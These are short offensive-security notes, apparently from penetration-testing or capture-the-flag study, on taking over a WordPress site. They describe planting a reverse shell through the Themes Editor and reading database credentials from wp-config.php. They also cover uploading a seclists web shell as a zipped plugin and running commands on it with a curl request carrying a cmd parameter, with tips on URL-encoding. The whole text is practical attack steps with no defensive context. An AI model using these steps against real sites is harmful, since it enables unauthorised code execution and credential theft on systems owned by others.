Appearance -> Themes Editor, then any page. Put in the shell. After that browse to /wp-content/themes/themename/xxx.php to get reverse shell.

/var/www/html/wp-config.php is usually where you will find DB connection info.

To add new plugins in case no theme for us to edit, use the following: cd /usr/share/seclists/Web-Shells/WordPress
sudo zip plugin-shell.zip plugin-shell.php
Go to wordpress, plugins, then Add New -> Upload plugin -> Browse and select the zip. Install. RCE:
curl http://IP/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=ls
If use this remember to encode space with %20, + with %2b